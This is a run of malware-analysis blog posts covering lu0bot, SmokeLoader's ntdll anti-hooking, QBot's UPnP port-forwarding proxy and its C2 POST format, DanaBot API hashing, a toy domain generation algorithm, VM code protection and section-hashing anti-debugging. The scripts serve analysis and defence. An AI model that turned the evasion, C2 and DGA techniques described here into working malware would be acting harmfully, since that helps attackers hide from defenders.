  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ] 
}

MITRE ATT&CK

  • T1059
  • T1482
  • T1083
  • T1046
  • T1057
  • T1518
  • T1082
  • T1614
  • T1016
  • T1124
  • T1005
  • T1008
  • T1571

ELI5 summary

  • lu0bot is a NodeJS Malware.
  • Network communications are mixing TCP (loader) and UDP (main stage).
  • It’s pushed at least with Garbage Cleaner.
  • Its default setup seems to be a aggressive telemetry harvester.
  • Due to its task manager architecture it is technically able to be everything.

Conclusion

Lu0bot is a curious piece of code which I could admit, even if I don’t like at all NodeJS/JavaScript code, the task manager succeeded in mindblowing me for its ingeniosity.

A wild fumik0_ being amazed by the task manager implementation

I have more questions than answers since then I started to put my hands on that one, but the thing that I’m sure, it’s active and harvesting data from bots that I have never seen before in such an aggressive way.

Special thanks: @benkow_

Examining Smokeloader’s Anti Hooking technique

24 May 2020 at 09:22

Hooking is a technique to intercept function calls/messages or events passed between software, or in this case malware. The technique can be used for malicious, as well as defensive cases.

Rootkits for example can hook API calls to make themselves invisible from analysis tools, while we as defenders can use hooking to gain more knowledge of malware or build detection mechanisms to protect customers.

Cybersecurity continues to be a game of cat and mouses, and while we try to build protections, blackhats will always try to bypass these protection mechanisms. Today I want to show you how SmokeLoader bypasses hooks on ntdll.dll and how Frida can be used to hook library functions.

The bypass was also already explained in a blog article from Checkpoint[1] written by Israel Gubi. It also covers a lot more than I do regarding Smokeloader, so it is definitely worth reading too.

Hooking with Frida

If you’ve read my previous blog articles about QBot, you are familiar with the process iteration and AV detection[3]. It iterates over processes and compares the process name with entries in a black list containing process names of common AV products. If one process name matches with an entry, QBot quits its execution.

Frida is a Dynamic Instrumentation Toolkit which can be used to write dynamic analysis scripts in high level languages, in this case JavaScript. If you want to know more about this technology, I advice you to read to visit this website[4] and read its documentation.

We can write a small Frida script to hook the lstrcmpiA function in order to investigate which process names are in the black list.

def main():
    """Main."""
    # argv[1] is our malware sample
    pid = frida.spawn(sys.argv[1])
    sess = frida.attach(pid)
    script = sess.create_script("""
        console.log("[+] Starting Frida script")
        var lstrcmpiA = ptr("0x76B43E8E")
        console.log("[+] Hooking lstrcmpiA at " + lstrcmpiA)
        Interceptor.attach(lstrcmpiA, {
            onEnter: function(args) {
                console.log("[+][+] Called strcmpiA");
                console.log("[+][+] Arg1Addr = " + args[0]);
                console.log("[+][+] Buffer");
                pretty_print(args[0], 0x30);
                console.log("[+][+] Arg2Addr = " + args[1]);
                console.log("[+][+] Buffer");
                pretty_print(args[1], 0x30);
            },
            onLeave: function(retval) {
                console.log("[+][+] Returned from strcmpiA")
            }
        });

        function pretty_print(addr, sz) {
            var bufptr = ptr(addr);
            var bytearr = Memory.readByteArray(bufptr, sz);
            console.log(bytearr);
        };

        """)
    script.load()
    frida.resume(pid)
    sys.stdin.read()
    sess.detach()

We attach to the malicious process and hook the lstrcmpiA function at static address. When analysing malware, we have (most of the time) the privilege to control and adjust our environment as much as we want. If you turn off ASLR and use snapshots, using Frida with static pointers is pretty convenient, because most functions will always have the same address. However, it’s also possible to calculate the addresses dynamically. lstrcmpiA has 2 arguments, which are both pointers of type LPSTR. So we just resolve the pointers, fill 0x30 bytes starting at pointer address into a ByteArray and print it.

Result of Frida Script

Smokeloader’s Anti Hooking technique

So how does Smokeloader bypass hooks? Well it can do it atleast for the ntdll.dll library. During execution Smokeloader retrieves the Temp folder path and generates a random name. If a file with the generated name already exists in the temp folder, it is deleted with DeleteFileW.

drltrace output DeleteFileW call, deleting 9A26.tmp in Temp Folder

Next the original ntdll.dll file is copied from system32 to the temp folder with the exact name it just generated. This leads to a copy of this mentioned library being placed in the temp directory.

Meta data of disguised ntdll.dll
Export functions of the disguised ntdll file

Instead of loading the real ntdll.dll file, the copy is loaded into memory by calling LdrLoadDll.

9A26.tmp as ntdll.dll

Most AV vendors, as well as analysts probably implemented their hooks on ntdll.dll, so the references to the copied ntdll.dll file will be missed.

Smokeloader continues to call functions from this copied DLL, using for example function calls like NtQueryInformationProcess to detect wether a debugger is attached to it.

Final Words

While analysing SmokeLoader at work, I stumbled across this AntiHook mechanism, which I haven’t seen before, so I wanted to share it here :-).


I’ve also only scratched on the surface of what Frida is capable of. I might work on something more complex next time.

Taming Virtual Machine Based Code Protection – 1

7 June 2020 at 09:09

Overcoming obfuscation in binaries has always been an interesting topic for me, especially in combination with malware. Over the last weeks I’ve been playing around with Virtualised Code Protection in order to see how well I could handle it.

I decided to download a simple crack-me challenge which is obfuscated with this technique. It takes me some time to reverse everything, so there will be atleast 2 blog articles about my little project.

Challenge from crackmes.de

Virtualised Code Protection

Each architecture has a defined instruction set. By looking up the instructions to the corresponding bytes, we are able to translate these bytes into disassembly. The unit that actually executes these bytes is the CPU.

Virtual machine based code protection emulates a processor and thus switches our usual instruction set against a custom one. So in order to really understand what a virtual machine hardened binary is doing on a low level basis, we need to reverse the virtual machine first. This means we have to understand the custom instruction set.

I want to show you a practical example of how such a custom instruction can look like and be discovered.

Practical Example

Preparing the virtual machine

The challenge demands a serial key and a username. Both of them need certain values for the serial key to be valid. After entering a username and a serial key, the length of both of them are checked first.

Next At the bottom of this routine, we can already spot 2 interesting functions and operations which push the success or failure message onto the stack.

Preparing the virtual machine and jumping to the serial key check

The function InitialiseVM is where it gets interesting for us. If you just look quickly through the disassembly in the figure below, you will see that there are multiple buffers allocated and static values written into an internal structure. Furthermore it is filled with function pointers. Each one of those functions represents a custom instruction. This routine is used to allocate the virtual address space our virtual machine will use for emulation, as well as a table to select custom instructions from.

InitialiseVM function

Next is the CheckSerial function, which implements the virtual machine loop that emulates the virtual processor unit.

Virtual machine loop at the bottom

In the block at loc_4015E5 the function sub_4013DF is executed each iteration. Afterwards the byte which the address in ESI+0x7C points to is used to calculate the dynamic call at the end of the current block we are talking about (call dword ptr [esi+eax*4+80h]). That means that the byte influencing which function to enter, is deciding which custom instruction to execute. Before we look at how some of the opcodes are actually parsed here, let’s review how the virtualised address space of this VM looks like.

Overview of the current vm address space

Executing custom instructions

The function sub_4013DF is called each iteration and reads bytes from the buffer which contains opcodes for custom instructions. The first one has a size of 5 bytes. Each of them is used by the virtual machine for translating these opcodes into a valid operation. At the moment of writing this article, I did not fully explore this function yet. However, I am confident that the last 2 bytes of an instruction are used to influence registers.

Upon returning from this function, the program takes the first byte of the ESI+0x7C structure and uses it to determine which function from the previously allocated function table is called. The first run returns EAX=3, so we are dealing with the custom instruction with instruction id 3.

Let’s jump into our first custom instruction.

Overview of function representing instruction id 3

The function sub_401271 has 31 XRefs and is used in every function from the function table. Before the function is called, the pointer to ESI+7C, our 0x24 buffer holding the custom opcodes are retrieved.0xC is added, that means we are pointing at the byte at ESI+7C+0xC, the 4th DWORD in this buffer.

The routine accesses the third byte of the current opcode and is responsible for determining the instruction type. The first four bits decide wether it is an instruction utilizing 2 registers, a memory read or moving an immediate value into a register. The second 4 bits influence the size of the byte that will be moved around. These 4 bits are zero extended into bytes.

Take a look at the figure below. The result of our InstrType function is saved in ebp+0x4. Next the memory address which ESI+0x20 points at is decreased and filled with the value we just computed. Doesn’t this look familiar ? The stack is also decreased if we put data onto it.

Block decreasing the virtual stack and writing the result into it

It seems that the custom instruction we just investigated is a custom PUSH instruction. ESI+0x20 points to the virtual stack that is emulated by this virtual machine. Since the pointer at ESI+0x4C is increased here after an instruction, it might hold the virtual instruction pointer.

So far we figured out what the first 3 opcodes do and we have an idea what the last 2 ones are responsible for. In order to give a proper answer on how they are used, it is needed to look at more than just 1 virtual instruction execution.

Final thoughts regarding opcodes

Conclusion

So it just took me a complete blog article to really explain how to reverse a single custom instruction of a binary hardened with Virtualised Code Protection ;-). As you can see, this kind of software protection is very powerful.

I will finish this challenge for sure and will write a second blog article about how I solved it.

UpnP – Messing up Security since years

21 June 2020 at 08:01

UpnP is a set of networking protocols to permit network devices to discover each other’s presence on a network and establish services for various functionalities.
Too lazy to port forward yourself ? Just enable UpnP to automatically establish working configurations with devices! Dynamic device configuration like this makes our life more comfortable for sure. Sadly it also comes with many security issues.

In this blog article I am focusing on mentioning the stages of the UpnP protocol, a quick introduction to security issues regarding UpnP and how QBot abuses the UpnP protocol to exploit devices as proxy C2 servers.

UpnP in a nutshell

UpnP takes usage of common networking protocols and stacks HTTP, SOAP and XML on top of the IP protocol in order to provide a variety of functionalities for users. Without going to deep into how UpnP works in detail, the following figure is enough for the basics.

Quick explanation of existing stages in UpnP protocol

Some services a node with UpnP enabled can offer (it really depends on the device):

  • Port forwarding
  • Switching power on and off for light bulbs
  • etc.

This is very high level of course. If you are interested in everything about UpnP, I recommend you to check out Wikipedia[1] for a high level introduction or read this report that goes more into detail[2].

For the following content of this blog article, only the first three stages are really relevant.

IoT Security and UpnP

Misconfiguration

Again, while it might be very convenient for customers to have devices autoconfigure themselves, it leads to huge security risks.

Many routers have UpnP enabled by default. Think of misconfigured IoT devices that sends a command to port forward a specific port, leading to a port exposure to the internet.

It is known that many IoT devices contain awful security flaws like default credentials for telnet. If devices like this have such misconfigurations and expose its telnet port to the outside, it probably takes about 5 minutes till some script kiddie adds this device to its botnet.

Exploitation

A blog post from TrendMicro[3] previously mentioned that many devices still use very old UpnP libraries which are not up to date to current security standards. This creates a larger attack surface for attackers. The newest one being CallStranger.

source : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695

It is caused by the Callback header value in the UpnP SUBSCRIBE function. This field can be controlled by an attacker and enabled a Server Side Request Forgery like vulnerability. It can be used for the following malicious cases:

  • Exfilitrate data
  • Scan networks
  • Force nodes to participate in DDoS attacks

I recommend you to visit the official domain[4] of this vulnerability, if you want gain more knowledge about this vulnerability.

UpnP abused by QBot

Security risks created by UpnP are not limited to the IoT landscape of course.

Another method to use UpnP for malicious cases is to install Proxy C2 servers on devices which have the mentioned protocol enabled, like QBot does for example. Let’s take a look at how this is done.

Diving into QBot’s UpnP proxy module

This technique was first discovered by McAfee[4] in 2017. First QBot starts scanning for devices which have UpnP enabled and is one of the following device types:

  • urn:schemas-upnp-org:device:InternetGatewayDevice:1
  • urn:schemas-upnp-org:service:WANIPConnection:1
  • urn:schemas-upnp-org:service:WANPPPConnection:1
  • upnp:rootdevice
Disassembly of strcmp calls to check for device type

If you are using INETSIM for malware analysis, you will probably realise that it does not offer any functionality to fake a SSDP or UpnP service in any way. However, we can use this python script[5] by user GrahamCobb which emulates a fake SSDP service and adjust the device description to suit our needs.

Once the devices are discovered, it sends requests for device descriptions and checks whether it deals with an internet gateway device. This can be determined by looking at the device description itself.

Capture SSDP traffic, showing the MSEARCH request and retrieval of the device description

If it is an internet gateway device, it confirms whether a connection exists by sending a GetStatusInfo followed by retrieving the external ip address of this device by sending the GetExternalIPAddress command.

Next it tries to use the AddPortMapping command to add port forwarding rules to the device.

Port forwarding command sent to fake SSDP service

Afterwards all rules are removed again and the ports which were successfully port forwarded are sent as a HTTP-POST to the C2 server.
The carrier protocol is HTTPS and the response is sent in the following form:

# destination address
https://[HARDCODED_IP]:[HARDCODED_PORT]/bot_serv

# POST DATA form, successful port forwarded ports are appended to ports
cmd=1&msg=%s&ports=

From this point on, my analysis stopped for now. However, McAfee explains that a new binary is downloaded from the contacted C2 server, which re-adds the port forwarding rules and is responsible for the C2 communication. The blog article I’ve referenced above explains the whole functionality, so I recommend you to take a look at it, if you are interested in the next steps.

Final Words

As you can see UpnP contains many security flaws and can lead to a compromised network. If you have UpnP enabled in your company’s network, I really recommend to check whether this is really needed and turn it off if it is not necessary.

So exams at university are coming up next, it will probably take some time until I can get my hands on the QBot C2 protocol or the proxy binary. I do however, want to look at these two functionalities next.

Deobfuscating DanaBot’s API Hashing

12 July 2020 at 13:27

You probably already guessed it from the title’s name, API Hashing is used to obfuscate a binary in order to hide API names from static analysis tools, hindering a reverse engineer to understand the malware’s functionality.
A first approach to get an idea of an executable’s functionalities is to more or less dive through the functions and look out for API calls. If, for example a CreateFileW function is called in a specific subroutine, it probably means that cross references or the routine itself implement some file handling functionalities. This won’t be possible if API Hashing is used.

Instead of calling the function directly, each API call has a corresponding checksum/hash. A hardcoded hash value might be retrieved and for each library function a checksum is computed. If the computed value matches the hash value we compare it against, we found our target.

API Hashing used by DanaBot

In this case a reverse engineer needs to choose a different path to analyse the binary or deobfuscate it. This blog article will cover how the DanaBot banking trojan implements API Hashing and possibly the easiest way on how this can be defeated. The SHA256of the binary I am dissecting here is added at the end of this blog post.

Deep diving into DanaBot

DanaBot itself is a banking trojan and has been around since atleast 2018 and was first discovered by ESET[1]. It is worth mentioning that it implements most of its functionalities in plugins, which are downloaded from the C2 server. I will focus on deobfuscating API Hashing in the first stage of DanaBot, a DLL which is dropped and persisted on the system, used to download further plugins.

Reversing the ResolvFuncHash routine

At the beginning of the function, the EAX register stores a pointer to the DOS header of the Dynamic Linked Library which, contains the function the binary wants to call. The corresponding hash of the yet unknown API function is stored in the EDX register. The routine also contains a pile of junk instructions, obfuscating the actual use case for this function.

The hash is computed solely from the function name, so the first step is to get a pointer to all function names of the target library. Each DLL contains a table with all exported functions, which are loaded into memory. This Export Directory is always the first entry in the Data Directory array. The PE file format and its headers contain enough information to reach this mentioned directory by parsing header structures:

Cycling through the PE headers to obtain the ExportDirectory and AddressOfNames

In the picture below, you can see an example of the mentioned junk instructions, as well as the critical block, which compares the computed hash with the checksum of the function we want to call. The routine iterates through all function names in the Export Directory and calculates the hash.
The loop breaks once the computed hash matches the value that is stored in the EDX register since the beginning of this routine.

Graph overview of obfuscated API Hashing function

Reversing the hashing algorithm

The hashing algorithm is fairly simple and nothing too complicated. Junk instructions and opaque predicates complicate the process of reversing this routine.

The algorithm takes the nth and the stringLength-n-1th char of the function name and stores them, as well as capitalised versions into memory, resulting in a total of 4 characters. Each one of those characters is XOR'd with the string length. Finally they are multiplied and the values ​​are added up each time the loop is run and result in the hash value.

def get_hash(funcname):
    """Calculate the hash value for function name. Return hash value as integer"""
    strlen = len(funcname)
    # if the length is even, we encounter a different behaviour
    i = 0
    hashv = 0x0
    while i < strlen:
        if i == (strlen - 1):
            ch1 = funcname[0]
        else:
            ch1 = funcname[strlen - 2 - i]
        # init first character and capitalize it
        ch = funcname[i]
        uc_ch = ch.capitalize()
        # Capitalize the second character
        uc_ch1 = ch1.capitalize()
        # Calculate all XOR values
        xor_ch = ord(ch) ^ strlen
        xor_uc_ch = ord(uc_ch) ^ strlen
        xor_ch1 = ord(ch1) ^ strlen
        xor_uc_ch1 = ord(uc_ch1) ^ strlen
        # do the multiplication and XOR again with upper case character1
        hashv += ((xor_ch * xor_ch1) * xor_uc_ch)
        hashv = hashv ^ xor_uc_ch1
        i += 1
    return hashv

A python script for calculating the hash for a given function name is also uploaded on my github page[2] and free for everyone to use. I’ve also uploaded a text file with hashes for exported functions of commonly used DLLs.

Deobfuscation by Commenting

So now that we cracked the algorithm, we want to update our disassembly to know which hash value represents which function. As I’ve already mentioned, we want to focus on simplicity. The easiest way is to compute hash values for exported functions of commonly used DLLs and write them into a file.

Generated hashes

With this file, we can write an IdaPython script to comment the library function name next to the Api Hashing call. Luckily the Api Hashing function is always called with the same pattern:

  • Move the wanted hash value into the EDX register
  • Move a DWORD into EAX register

First we retrieve all XRefs of the Api Hashing function. Each XRef will contain an address where the Api Hashing function is called at, which means that in atleast the 5 previous instructions, we will find the mentioned pattern. So we will fetch the previous instruction until we extract the wanted hash value, which is being pushed into EDX. Finally we can use this immediate to extract the corresponding api function from the hash values we have generated before and comment the function name next to the Xref address.

def add_comment(addr, hashv, api_table):
    """Write a comment at addr with the matching api function.Return True if a corresponding api hash was found."""
    # remove the "h" at the end of the string
    hashv = hex(int(hashv[:-1], 16))
    keys = api_table.keys()
    if hashv in keys:
        apifunc = api_table[hashv]
        print "Found ApiFunction = %s. Adding comment." % (apifunc,)
        idc.MakeComm(addr, apifunc)
        comment_added = True
    else:
        print "Api function for hash = %s not found" % (hashv,)
        comment_added = False
    return comment_added


def main():
    """Main"""
    f = open(
        "C:\\Users\\luffy\\Desktop\\Danabot\\05-07-2020\\Utils\\danabot_hash_table.txt", "r")
    lines = f.readlines()
    f.close()
    api_table = get_api_table(lines)
    i = 0
    ii = 0
    for xref in idautils.XrefsTo(0x2f2858):
        i += 1
        currentaddr = xref.frm
        addr_minus = currentaddr - 0x10
        while currentaddr >= addr_minus:
            currentaddr = PrevHead(currentaddr)
            is_mov = GetMnem(currentaddr) == "mov"
            if is_mov:
                dst_is_edx = GetOpnd(currentaddr, 0) == "edx"
                # needs to be edx register to match pattern
                if dst_is_edx:
                    src = GetOpnd(currentaddr, 1)
                    # immediate always ends with 'h' in IDA
                    if src.endswith("h"):
                        add_comment(xref.frm, src, api_table)
                        ii += 1
    print "Total xrefs found %d" % (i,)
    print "Total api hash functions deobfuscated %d" % (ii,)


if __name__ == '__main__':
    main()

Conclusion

As reverse engineers, we will probably continue to encounter Api Hashing in various different ways. I hope I was able to show you some quick & dirty method or give you at least some fundament on how to beat this obfuscation technique. I also hope that, the next time a blue team fellow has to analyse DanaBot, this article might become handy to him and saves him some time reverse engineering this banking trojan.

IoCs

  • Dropper = e444e98ee06dc0e26cae8aa57a0cddab7b050db22d3002bd2b0da47d4fd5d78c
  • DLL = cde01a2eeb558545c57d5c71c75e9a3b70d71ea6bbeda790a0b871fcb1b76f49

Linux/Windows Internals – Process structures

9 August 2020 at 13:43

Having an overview of the running processes on the operating system is something we usually take for granted. We can’t think of working without fundamental features like that.

But how does the kernel keep track of the processes, which are currently running ? Today, we take a look at the corresponding structures of the Windows and the Linux system, which are responsible for holding track of the running processes.

Linux – Task structures

If you ever used Linux before, you are probably familiar with the ps command, which allows you to print the list of all processes currently running on the system. We will dive into how the Linux kernel keeps track of these processes internally.

The kernel stores a list of processes in a doubly linked list, called the task list. Each node in this list is a process descriptor of the type task_struct. The definition of this task struct can be found in linux/sched.h[1] of Linus Torvald’s git repository.

Some struct members of task_struct

If you checked out the code, you will realise that this structure is pretty extensive and we will not dive into every member of this structure. Our focus lies on understanding how the kernel handles this task list. As I’ve already explained, the kernel keeps track of all processes by a doubly linked list. Each task structure holds a member tasks of type list_head.

struct list_head {
    struct list_head *next, *prev;
};

As you’ve probably already guessed, the next pointer holds a reference, which allows us to retrieve the next task_struct and the prev field allows us to take a step back. We can write a simple to linux kernel module to iterate through the task list and print out all process names and process ids on the current system:

Iterating through the linked list

Task structures lie in kernel space, so accessing these is not possible without writing a kernel module. The code is pretty straight forward. We just use the init_task as an initial entry point, which is the idle task running on the linux system. Iterating through the linked list is possible via the next_task macro. Then we use the printk function to log the comm(process executable) member and the process id.

#include <linux/sched/task.h> 
#include <linux/sched/signal.h>
#include <linux/module.h>    
#include <linux/kernel.h>    
#include <linux/init.h>      

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Andreas Klopsch");
MODULE_DESCRIPTION("Simple module for printing task structure members");
MODULE_VERSION("0.1");
  
// get the top element in the task doubly linked list
extern struct task_struct init_task;


static int __init action_init(void){
	struct task_struct task;
	printk(KERN_INFO "Init task = %s", init_task.comm);
	printk(KERN_INFO "Getting next task");
	task = *(next_task(&init_task)); // deference pointer for convencience reasons
	while(task.pid != init_task.pid) {
		printk(KERN_INFO "Comm = %s pid = %d", task.comm, task.pid);
		task = *(next_task(&task)); // dereference again, use macro to not iterate through list_head
	}
	return 0;
 }
 

static void __exit action_exit(void){
	printk(KERN_INFO "Stopping task iterator");
}
 
module_init(action_init);
module_exit(action_exit);

dmesg output

Windows – EPROCESS

On Windows, there are similarities with Linux. Each process on Windows is represented by an EPROCESS structure, which is actually the representation of a process object. The EPROCESS structure also contains a KPROCESS structure, which holds information for the kernel.

As with Linux, this block contains various information relating to the corresponding process, like:

  • Virtual Address Descriptors, holding the map of the process virtual memory
  • Process ID
  • Image base name

Another similarity with the Linux system, is the way the processes are linked with each other. EPROCESS structures are connected to each other via a doubly linked list, called ActiveProcessLinks. The next process in the list is referenced by FLink and the previous process object is referenced by the BLink pointer. One way of how this could be implemented, is iterating through the ActiveProcessLinks structure again.

References

  • Windows Internals, Part 1: System Architecture, Processes, Threads, Memory Management, and More
  • Mastering Malware Analysis: The complete malware analyst’s guide to combating malicious software, APT, cybercrime, and IoT attacks 

DGAs – Generating domains dynamically

5 November 2020 at 09:49

A domain generation algorithm is a routine/program that generates a domain dynamically. Think of the following example:

An actor registers the domain evil.com. The corresponding backdoor has this domain hardcoded into its code. Once the attacker infects a target with this malware, it will start contacting its C2 server.

As soon as a security company obtains the malware, it might blacklist the registered domain evil.com. This will hinder any attempts of the malware to receive commands from the original C2.

If a domain generation algorithm would have been used, the domain will be generated based on a seed. The current date for example is a popular seed amongst malware authors. A simple domain blacklisting would not solve the problem. The security company will have to resort to different methods.

By generating domains dynamically, it is harder for defenders to hinder the malware from contacting its C2 server. It will be necessary to understand the algorithm.

Example implementation of a DGA

A quick & dirty implementation(loosely based on Wikipedia)[1] of such algorithm could look like this:

"""Example implementation of a domain generation algorithm."""

import sys
import time
import random


def gen_domain(month, day, hour, minute):
    """Generate the domain based on time. Return domain"""
    print(
        f"[+] Gen domain based on month={month} day={day} hour={hour} min={minute}")
    domain = ""
    for i in range(8):
        month = (((month * 8) ^ 0xF))
        day = (((day * 8) ^ 0xF))
        hour = (((hour * 8) ^ 0xF))
        minute = (((minute * 8) ^ 0xF))
        domain += chr(((month * day * hour * minute) % 25) + 0x61)
    return domain


try:
    while True:
        d = gen_domain(random.randint(1, 12), random.randint(1, 30),
                       random.randint(0, 24), random.randint(0, 60))
        print(f"[+] Generated domain = {d}")
        time.sleep(5)
except KeyboardInterrupt:
    sys.exit()

Our DGA algorithm would use the current date and time as a seed. Each parameter is multiplied with 8 and XOR’d with 0xF. Finally all four values are multiplied with each other. The final operations are used to make sure that we generate a character in small caps. The output of this program looks like this:

[+] Gen domain based on month=12 day=2 hour=4 min=4
[+] Generated domain = taavtaab.com
[+] Gen domain based on month=3 day=10 hour=11 min=36
[+] Generated domain = kugxfkvx.com
[+] Gen domain based on month=2 day=27 hour=4 min=1
[+] Generated domain = kaasuapn.com

Seed or Dictionary based

There are different main approaches when implementing a domain generation algorithm. For the sake of keeping this simple, we will not focus on the hybrid approach.

Different kinds of approaches

Seed based Approach

We already introduced the first one. Our implementation is an algorithm based on a seed, which is served as an input. Another example I can provide, is how APT34 used such seed based algorithm in a campaign targeting a government organisation in the Middle East. The campaign was discovered by FireEye[2].

The mentioned APT group used domain generation algorithms in one of their downloaders. The Downloader was named BONDUPDATER by FireEye and is implemented in the Powershell Scripting Language.

BONDLOADER DGA algorithm

The first 12 chars of the UUID is extracted. Next the program runs into a loop. Each iteration a new random number is generated and the domain is generated by concatenating hardcoded, as well as generated values. GetHostAddresses will try to resolve the generated domain. If it fails, a new iteration starts. Once a registered domain is generated and resolved, it will break the loop.

Depending on the resolved ip address, the script will trigger different actions.

Dictionary based Approach

The second approach is to create a dictionary based domain generation algorithm. Instead of focusing on a seed, a list of words could be provided. The algorithm randomly selects words from these lists, concatenates them and generates a new domain. Suppobox[3] is a malware, which implemented the dictionary based approach[4].

Defeating Domain Generation Algorithms

The straight forward way to counter these algorithms is to reverse engineer the routine and to predict future domains. One famous case of predicting future domains is the takedown of the Necurs Botnet by Microsoft[5]. By understanding the DGA, they were able to predict the domains for the next 25 months.

I am not a ML magician. However, just a quick google research shows that there is a lot research going on. Machine Learning based approaches to counter DGAs seems to be promising too.

Taming Virtual Machine Based Code Protection – 2

26 November 2020 at 14:02

In the last episode …

As you’ve probably guessed it, this is the second part of my journey to reverse engineer a virtual machine protected binary. If you haven’t read the first part[1], I encourage you to do so, because I will not repeat everything again here. While the first part dealt with explaining the virtual environment and giving an initial first look into the virtual machine’s custom instruction set, I will focus on disassembling the virtual machine code completely this time.

I might repeat some steps from the first part again, mostly because I felt that it was necessary to do so :-).

Into the battle

We already explained the environmental setup in the previous blog post and also identified the main loop, which is responsible for instruction execution.

Figure 1: Main loop responsible for instruction execution

Each iteration, an instruction is parsed and the final CALL in the left branch of figure 1 executes the instruction.

Critical functions

I covered the instruction parsing process in my last blog article a little bit. But since we are going to build a disassembler, I will explain the most important routines once again.

0x4013DF / ParseInstruction

This function is called each iteration in the loop from figure 1 and is responsible for parsing the byte codes.

Figure 2: ParseInstruction overview

Each loop, the Virtual Instruction Pointer/VIP is retrieved, pointing at the instruction to execute. Each instruction is parsed. This function is fully responsible for transforming the bytes into a further processable format. Let’s take a look at how the first three instructions are parsed:

Figure 3: Parsing instructions

If you are interested in understanding this format fully, I recommend you to jump to the disassembler code[2]. I will only cover the first instruction here.

So how do we get from 03 15 03 00 04 to the parsed format ?

The first byte is always the instruction id. 03 is the id for the PUSH instruction. The second byte is divided into its upper 6 bits and lower 2 bits, representing the instruction size and number of operands used for this instruction. The next bytes are used to represent a single operand. In the example above, the first operand config 00 03 00 00, is the configuration for USE 32 BIT OF REGISTER, SPECIFIED BY THE NEXT DWORD 04 00 00 00. The next DWORD is 04 00 00 00, which is the fourth virtual register. Now what is the fourth register here ? Let’s take a quick look at the instructions.

PUSH VR4
MOV VR4, VR7
SUB VR7, 0xB4

This looks very similar to the usual function prologue ;-). So the fourth register must be EBP!.

PUSH EBP
MOV EBP, ESP
SUB ESP, 0xB4

0x401271 / GetOpval & 0x401322 / StoreOpval

I will not cover these two functions in depth here. If you take a look at figure 3 again, you will see that I mention the operand configs. These functions are responsible for filling the operands according to these configs.

In the example above, the SUB VR7, 0xB4 instruction uses 00030000 07000000 for the first operand and 00020000 B4000000 for the second config. If you reverse engineer every single option, you will find out that the following configurations exist:

# First DWORD CONFIG
00000000 ==> LOWEST BYTE OF REG X # f.e AX
00010000 ==> SECOND LOWEST BYTE OF REG X # f.e. AH 
00020000 ==> LOWER 16 BIT OF REG X # f.e. AX
00030000 ==> 32 BIT OF REGX # f.e. EAX
01000000 ==> BYTE AT LOC
01010000 ==> BYTE AT LOC
01020000 ==> WORD AT LOC
01030000 ==> DWORD AT LOC
02000000 == BYTE FROM IMM.
02010000 ==> BYTE FROM IMM.
02020000 ==> WORD FROM IMM.
02030000 ==> DWORD FROM IMM.
# Second DWORD CONFIG, if register
00000000 ==> EAX
01000000 ==> EBX
02000000 ==> ECX
03000000 ==> EDX
04000000 ==> EBP
05000000 ==> ESI
06000000 ==> EDI
07000000 ==> ESP

Eternal Debugging

Now we can use the gained knowledge to gain an initial understanding of what is happening and to verify whether we are able to decode instructions manually.

Figure 4: Manually disassembled bytecode

If you take a look at the last instructions, you will see that there are some constants pushed into memory. If you google these constants, you will come to the conclusion that this must be the MD5 Init routine[3]. The next step is to build a disassembler.

Disassembling the code

I wrote this one in C++ and you can find the source code to it on my github page[4]. Writing this on Python would have been possible too … and probably a lot easier and faster, I chose C++ though for learning purposes. If my C++ is awful, forgive me. We all start somewhere ;-).

Figure 5: Output of decoded virtual machine bytes

Our disassembler does have some limitations though. The disassembly was complex and I believe that some memory address offsets and register sizes are wrong. Also, I did not reverse engineer all instructions. However though, that should not be a problem, because we only need to understand what is happening here on a higher level.

Identifying the algorithm

We already spotted the variables, which we also found in the MD5.c source code(f.e. 0x2381bc0). However, the actual hashing algorithm does not match the original one. Therefore it seems to be some kind of a modified version of it. Furthermore we spot a routine, which seems to be the XTEA algorithm[5].

Figure 6: Identified XTEA algorithm

Final words

So that’s basically it. I don’t know when and if I will a third part covering the serial key generator. When I started this challenge, I was only interested in learning how to disassemble custom instruction sets.

If you are interested in how others solved this challenge, I recommend you to read the tutorials from wagonono and kernelj, they both completely solved this challenge[6]. Wagonono also created a disassembler and his version is better than mine.

Catching Debuggers with Section Hashing

24 January 2021 at 10:41

As a Reverse Engineer, you will always have to deal with various anti analysis measures. The amount of possibilities to hamper our work is endless. Not only you will have to deal with code obfuscation to hinder your static analysis, but also tricks to prevent you from debugging the software you want to dig deeper into. I want to present you Section Hashing today.

I will begin by explaining how software breakpoints work internally and then give you an example of a Section Hashing implementation.

Debuggers – How software breakpoints work

When you set a breakpoint in your favourite debugger at a specific instruction, the debugger software will replace it temporarily with another instruction, which causes a fault or an interrupt. On x86, this is very often the INT 3 instruction, which is the opcode 0xCC. We can examine how this looks like in RAM.

We open x32dbg.exe and debug a 32 bit PE and set a breakpoint near the entry point.

Disassembly view of debugged program

When setting a breakpoint, you will see the original instruction instead of the patched one in the debugger. However, we can examine the same memory page in RAM with ProcessHacker.

Code section in RAM during debug session

In volatile memory, the byte 33 changed to CC, which will cause the program to halt when reached. This software interrupt will then be handled by the debugger and the code will be replaced again.

Catching Breakpoints with Section Hashing

After explaining how software breakpoints work, I’ll get to the real topic of this article now. We will move to the Linux world now for this example.

A software breakpoint is actually nothing else than a code modification of the executable memory section in RAM. Once a breakpoint is set, the .text section will be modified. A very known technique to catch such breakpoints in RAM is called Section Hashing.

Authors can embed the hash of the .text section in the binary. Upon execution, they use the same algorithm to generate a new hash from the .text section. If a software breakpoint is set, the hash will differ from the embedded hash. An example implementation can look like this:

Example implementation of Section Hashing

In this case, a hash of the .text section is generated. Afterwards it is used to influence the generation of the flag. If a software breakpoint is set during execution, a wrong hash will be generated.

This is a simple example of Section Hashing. In combination with code obfuscation and other anti analysis measurements, it can be very hard to spot this technique. It is also occasionally used by commercial packers.

Defeating Section Hashing

There are multiple ways to defeat this technique, some of them could be:

  • Patching instructions
  • Using hardware breakpoints

Instead of modifying the code in Random Access Memory, in x86 hardware breakpoints use dedicated registers to halt the execution. Hardware Breakpoints are still detectable.

